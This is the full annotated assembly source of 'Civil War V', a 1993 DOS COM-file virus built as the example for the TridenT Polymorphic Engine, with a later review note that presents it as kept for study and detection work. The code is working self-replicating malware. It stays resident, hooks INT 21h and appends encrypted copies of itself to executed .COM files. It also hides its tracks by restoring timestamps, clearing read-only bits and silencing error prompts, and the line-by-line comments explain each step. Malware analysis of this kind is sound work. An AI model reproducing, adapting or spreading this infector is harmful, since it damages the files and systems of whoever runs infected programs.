
;****************************************************************************
;   Civil War V V1.0                                                       *
;                                                                          *
;   Assembled with Tasm 2.5                                                *
;   (c) Jan '93 [ Dark Helmet / TridenT ], The Netherlands                 *
;                                                                          *
;****************************************************************************
;                                                                          *
; This is an example virus for the TPE engine.                             *
; We are not responsible if you use the TPE in an illegal or naughty way.  *
; The TridenT Polymorphic Engine version 1.3 should be used for linking    *
; with this virus.                                                         *
;                                                                          *
;****************************************************************************
; REVIEW NOTE (analysis annotation, not part of the original file):        *
;   Historical DOS COM infector: goes memory-resident, hooks INT 21h,      *
;   and on EXEC (4B00h) of a *.COM file appends a TPE-encrypted copy of    *
;   itself. Retained for study / detection-engineering purposes only;     *
;   assemble or run it solely in an isolated, disposable environment.      *
;****************************************************************************
  15.  
        .model  tiny                    ; COM image: CS=DS=ES=SS, code loaded at 100h
        .radix  16                      ; NOTE: unsuffixed numbers below are HEX (5a, 0100, 150, ...)
        .code

        org     100h                    ; COM entry point; the PSP occupies 0000-00FFh

        ; Supplied by the TPE object that is linked behind this file (see header).
        ; Their register contracts are not visible here; only what THIS file does
        ; with them is documented at the call sites.
        extrn   rnd_init:near           ; called once at install; its AX is added to a segment
        extrn   rnd_get:near            ; called right before crypt; AX is handed to crypt
        extrn   crypt:near              ; TPE entry: emits encrypted body + decryptor
        extrn   tpe_top:near            ; end-of-engine label; bounds copy/write length


; Byte length of everything that travels with an infection: this file's code
; from `begin` through the whole TPE. The 6-byte `dummy` stub is excluded.
len           equ offset tpe_top - begin
  29.  
  30.  
; Stand-in host for the unattached sample: a 3-byte near JMP to `begin` (at
; 106h) followed by the 'D','H',0 infection marker that check_infect looks
; for at file offsets 3-4. Real hosts receive the same prefix from write_jmp.
dummy:             db 0e9h, 03h, 00h, 44h, 48h, 00h       ; E9 0003 = jmp begin; "DH",0 = marker

; ---- entry point of the appended body ------------------------------------
; This code runs at an unknown offset inside the host, so BP is set to
; (runtime offset - assembled offset) and every data reference adds BP.
begin:             Call virus                            ; pushes the runtime IP of `virus`

virus:             pop      bp                          ; BP = where we really are
              sub      bp,offset virus                    ; BP = delta vs. assembly-time address

; Put the host's original first 6 bytes back at 100h. carrier_begin holds the
; bytes saved at infection time (for the dummy host: NOP, INT 20h, "DH",0).
; The host is not run from here; control reaches it only via end_virus.
restore_host:      mov      di,0100h
              lea      si,ds:[carrier_begin+bp]
              mov      cx,06h
              rep      movsb

; "Already resident?" handshake: the hooked INT 21h answers AH=0A0h with
; AX=0008h (see main_virus). If so, skip installation entirely.
check_resident:    mov    ah,0a0h
             int    21h
             cmp    ax,0008h
             je       end_virus

; Reserve 200h paragraphs (8 KB) at the top of the host's own memory block so
; the resident copy survives after the host terminates. CS-1 is the host's
; MCB; byte 0 = 'Z' (5Ah) marks the last block in the chain. Only a last
; block is shrunk; otherwise installation is abandoned (jne abort).
adjust_memory:     mov      ax,cs
              dec      ax
              mov      ds,ax                          ; DS = MCB segment
              cmp      byte ptr ds:[0000],5a          ; 'Z' = last block? (.radix 16)
              jne      abort
              mov      ax,ds:[0003]                   ; MCB+3 = block size in paragraphs
              sub      ax,200h                        ; shrink by 200h paragraphs = 8 KB
              mov      ds:[0003],ax
        sub    word ptr ds:[0012],200h           ; MCB+12h = PSP:0002 (top-of-memory paragraph)

; Copy the body to its resident segment. Destination = ES (= our PSP segment)
; + whatever rnd_init returns in AX. The TPE contract for that value is not
; visible in this file -- TODO confirm it lands inside the 8 KB just reserved.
install_virus:     call    RND_init

        mov      bx,ax
              mov      ax,es
              add      ax,bx
              mov      es,ax                          ; ES = resident segment

        mov      cx,len                         ; CX = bytes to copy (body + TPE)
              mov      ax,ds
              inc      ax
              mov      ds,ax                          ; DS = MCB+1 = our own segment again

; Source is `begin` (assembled at 106h, after the 6-byte dummy) but the
; destination is ES:0100h. The resident copy is therefore shifted by -6 with
; respect to its assembled labels, which is why every CS-relative reference
; in the resident handler is written as `label-6`.
        lea      si,ds:[begin+bp]
              lea      di,es:0100
              rep      movsb
              mov      [virus_segment+bp],es          ; remember the copy's segment (in the running image)
              mov     ax,cs
              mov      es,ax                          ; ES back to our own segment

; Hook INT 21h: save the current vector into the RESIDENT copy (DS = resident
; segment, hence the -6), then point the vector at main_virus over there.
hook_vector:       cli
              mov      ax,3521h                       ; AH=35h: get vector -> ES:BX
              int      21h
        mov     ds,[virus_segment+bp]
        mov      old_21h-6h,bx                     ; DS-relative store into the resident copy
              mov      old_21h+2-6h,es

              mov      dx,offset main_virus - 6h        ; DS:DX = resident main_virus
              mov      ax,2521h                       ; AH=25h: set vector
              int      21h
              sti

; Common exit: DS/ES back to CS (the host's segment) before running it.
abort:             mov      ax,cs
             mov      ds,ax
              mov      es,ax

; Hand control to the restored host at the normal COM entry point. This is
; also the target of the already-resident path, where DS/ES were never
; changed and still equal CS.
end_virus:         mov    bx,0100h
        jmp    bx
  101.  
  102.         
;*****************************************************************************
; Resident INT 21h handler. Runs in the resident copy, which was placed at
; ES:0100h from `begin` (assembled at 106h): hence every CS-relative data
; reference below is `label-6`.
; Two jobs: (1) answer the AH=0A0h "already installed?" probe with AX=0008h,
; (2) on AX=4B00h (EXEC) of a *.COM file, infect it, then pass the call on.
;*****************************************************************************

main_virus:        pushf
        cmp    ah,0a0h                          ; installation probe?
        jne    new_21h
        mov    ax,0008h                         ; reply AX=0008h (see check_resident)
        popf
        iret

; Every other call: preserve the caller's registers, inspect the function.
new_21h:    push    ds
        push    es
        push    di
        push    si
        push    ax
        push    bx
        push    cx
        push    dx

check_exec:    cmp    ax,04b00h                      ; INT 21h/4B00h = load and execute
        je    chk_com

; Pass-through: restore everything and tail-jump to the saved original
; vector. Flags come back via popf, so the original handler's IRET returns
; straight to the caller.
continu:    pop    dx
        pop    cx
        pop    bx
        pop    ax
        pop    si
        pop    di
        pop    es
        pop    ds
        popf
        jmp    dword ptr cs:[old_21h-6]


; EXEC seen: DS:DX is the caller's ASCIZ path. Keep the pointer, then check
; that the name reads ".COM" followed by a NUL.
chk_com:    mov    cs:[name_seg-6],ds
        mov    cs:[name_off-6],dx
        cld
        mov    di,dx
        push    ds
        pop    es                                ; ES:DI = path
        mov    al,'.'
        repne    scasb                            ; scan for '.'; CX is not set here, it is whatever the caller left
        cmp    word ptr es:[di],'OC'              ; next two bytes "CO" (word constant is little-endian)
        jne    continu
        cmp    word ptr es:[di+2],'M'             ; then "M",0  -> exactly ".COM\0"
        jne    continu

; Switch to a private stack: SS = CS+150h, SP = 100h (CS is the resident
; segment here). The caller's SS:SP is kept for restore_stack.
own_stack:    cli
        mov    cs:[old_sp-6],sp
        mov    cs:[old_ss-6],ss
        mov    ax,cs
        add    ax,150h
        mov    ss,ax
        mov    sp,100h
        sti

        call    set_int24h                       ; silence critical errors (see new_24h)
        call    set_atribuut                     ; clear the read-only bit on the target

; Open the target read/write. On failure (CF set) it jumps straight to the
; close/restore path, which then operates on whatever `handle` still holds.
open_file:    mov    ds,cs:[name_seg-6]
        mov    dx,cs:[name_off-6]
        mov    ax,3D02h                          ; AH=3Dh, AL=02h: open read/write
        call     do_int21h
        jc    close_file

        mov    cs:[handle-6],ax
        mov    bx,ax

        call    get_date                         ; remember the timestamp so it can be put back

; Read the first 6 bytes into carrier_begin. They serve both as the
; "already infected?" probe and as the bytes restore_host will write back
; in the new copy.
check_infect:    mov    bx,cs:[handle-6]
        mov    ah,3fh                            ; AH=3Fh: read CX bytes into DS:DX
        mov    cx,06h
        lea    dx,cs:[carrier_begin-6]
        call    do_int21h

        push    cs
        pop    ds
        mov    al, byte ptr [carrier_begin-6]+3   ; file offset 3 -> AL
        mov    ah, byte ptr [carrier_begin-6]+4   ; file offset 4 -> AH
        cmp    ax,cs:[initials-6]                ; == 4844h, i.e. "DH" ?
        je    save_date                          ; marker present: do not infect twice

; Seek to the end to learn the size. Only AX (low 16 bits of DX:AX) is used;
; minus 3 it is the rel16 displacement for a JMP encoded at offset 0
; (E9 xx xx): target = 3 + (size-3) = size, i.e. the appended body.
get_lenght:    mov    ax,4200h                    ; AL=0: seek from start (rewind)
        call    move_pointer
        mov    ax,4202h                          ; AL=2: seek from end -> DX:AX = size
        call    move_pointer
        sub    ax,03h
        mov    cs:[lenght_file-6],ax

        call    write_jmp                        ; patch the 5-byte prefix
        call    write_virus                      ; append the TPE-encrypted body

; Restore the original date/time (AH=57h AL=01h: set file date/time).
save_date:    mov    bx,cs:[handle-6]
        mov    dx,cs:[date-6]
        mov    cx,cs:[time-6]
        mov    ax,5701h
        call    do_int21h


close_file:    mov    bx,cs:[handle-6]
        mov    ah,03eh                           ; AH=3Eh: close handle
        call    do_int21h

        mov    dx,cs:[old_24h-6]                 ; put the previous INT 24h vector back
        mov    ds,cs:[old_24h+2-6]
        mov    ax,2524h
        call    do_int21h


; Back onto the caller's stack, then fall into the pass-through path so the
; original EXEC proceeds. (The attribute cleared in set_atribuut is not
; restored anywhere in this file.)
restore_stack:    cli
        mov    sp,cs:[old_sp-6]
        mov    ss,cs:[old_ss-6]
        sti


                jmp     continu



; Replacement INT 24h (critical-error) handler: always answers AL=03h
; ("fail the call"), so DOS never shows Abort/Retry/Fail while infecting.
new_24h:    mov    al,03h
        iret
  225.  
  226. ;---------------------------------------------------------------------------
  227. ;            PROCEDURES
  228. ;---------------------------------------------------------------------------
  229.  
; Seek helper. In: AX = LSEEK function chosen by the caller (4200h = from
; start, 4202h = from end). Sets DS=CS, BX=handle, CX:DX=0 and calls DOS.
; Out: DX:AX = new absolute position (callers only look at AX).
move_pointer:    push    cs
        pop    ds
        mov    bx,[handle-6]
        xor    cx,cx
        xor    dx,dx
        call    do_int21h
        ret
  237.  
; Emulates `int 21h` by PUSHF + far CALL to the ORIGINAL vector. This goes
; around our own hook, so the handler does not re-enter itself while it is
; busy infecting.
do_int21h:    pushf
        call     dword ptr cs:[old_21h-6]
        ret
  241.  
; Overwrite the first 5 bytes of the host with E9 <lenght_file> 'D' 'H':
; a JMP to the appended body followed by the infection marker. Byte 5 of the
; original prefix is left in place (all 6 were saved in carrier_begin).
; move_pointer leaves DS=CS, so the [label-6] operands below are CS-relative.
write_jmp:    mov    ax,4200h
        call    move_pointer

        mov    ah,40h                            ; AH=40h: write CX bytes from DS:DX
        mov    cx,01h
        lea    dx,[jump-6]                       ; E9h opcode
        call    do_int21h

        mov    ah,40h
        mov    cx,02h
        lea    dx,[lenght_file-6]                ; rel16 displacement
        call    do_int21h

        mov    ah,40h
        mov    cx,02h
                lea     dx,[initials-6]          ; "DH"
        call    do_int21h
        ret
  260.  
; Append the body. The plaintext in this segment (CS:0100h, `len` bytes) is
; handed to the TPE, which builds an encrypted copy plus decryptor in a work
; segment; that output is then written at end of file.
write_virus:    mov    ax,4202h
        call    move_pointer

; TPE call-site register setup (names taken from the original comments):
;   ES    = CS+90h     work segment the engine writes into
;   DS:DX = CS:0100h   code to encrypt (the resident body, see install_virus)
;   BP    = lenght_file+103h = 100h + host size = load offset of the appended
;           code, so the generated decryptor can be position-dependent
;   CX    = len        bytes to encrypt
;   SI    = 0          "distance encryptor/decryptor"
;   AX    = rnd_get result, labelled "type of encryption"
; What crypt leaves in DS:DX and CX is not visible here (TPE contract); the
; final write below depends on it.
TPE_engine:    mov    ax,cs
        add    ax,90h
        mov    es,ax

        push    cs
        pop    ds
        mov    dx,100h

        mov    bp,[lenght_file-6]
        add    bp,103h

                mov     cx,len

        xor    si,si

                call    rnd_get
         call    crypt

                mov     bx,cs:[handle-6]
                mov     ah,40h                   ; AH=40h: write the engine's output
        call    do_int21h
                ret
  287.  
; AH=57h AL=00h: get date/time of the file in BX (caller set BX = handle).
; Keeps DX (date) and CX (time) so save_date can put them back afterwards.
get_date:    mov    ax,5700h
        call    do_int21h
        push    cs
        pop    ds
        mov    [date-6],dx
        mov    [time-6],cx
        ret
  295.  
; Save the current INT 24h vector (AH=35h returns it in ES:BX) and install
; new_24h in its place with DS:DX = CS:new_24h-6 (resident-copy offset).
set_int24h:    mov    ax,3524h
        call    do_int21h
        mov    cs:[old_24h-6],bx
        mov    cs:[old_24h+2-6],es
        mov    dx,offset new_24h-6
        push    cs
        pop    ds
        mov    ax,2524h
        call    do_int21h
        ret
  306.  
; Clear the read-only bit on the target: AH=43h AL=00h (get attributes into
; CX), AND CL with 0FEh (bit 0 = read-only), then AH=43h AL=01h (set).
; DS:DX = the path saved in chk_com. The original value is not kept, so
; nothing in this file ever restores it.
set_atribuut:    mov    ax,4300h
        mov    ds,cs:[name_seg-6]
        mov    dx,cs:[name_off-6]
        call    do_int21h
        and    cl,0feh
        mov    ax,4301h
        call    do_int21h
        ret
  315.  
;---------------------------------------------------------------------------
;                DATA
; All of these are addressed as `label-6` from the resident copy (see
; install_virus) and as `label+bp` from a freshly loaded infected host.
;---------------------------------------------------------------------------

virus_name    db  "Civil War V v1.0, (c) Jan '92"   ; not referenced by code (header says Jan '93)
old_21h            dw  00h,00h                      ; saved INT 21h vector: offset, segment
old_24h        dw  00h,00h                          ; saved INT 24h vector
old_ss        dw  ?                                 ; caller's SS:SP while on the private stack
old_sp        dw  ?
carrier_begin      db  090h, 0cdh, 020h, 044h, 048h, 00h  ; host's first 6 bytes; initial value = NOP, INT 20h, "DH",0 (dummy host)
jump        db  0e9h                                ; JMP rel16 opcode written at file offset 0
name_seg    dw  ?                                   ; far pointer to the EXEC'd path (from DS:DX)
name_off    dw  ?
virus_segment      dw  ?                            ; segment of the resident copy
lenght_file    dw  ?                                ; host size - 3 = JMP displacement
handle        dw  ?                                 ; open handle of the current target
date        dw  ?                                   ; target's original date/time
time        dw  ?
initials    dw  4844h                               ; "DH" marker as a little-endian word (AL='D', AH='H')
writer        db  "[ DH / TridenT ]"                ; credit string; not referenced by code

              end dummy                             ; entry point = the 6-byte stub at 100h
  338.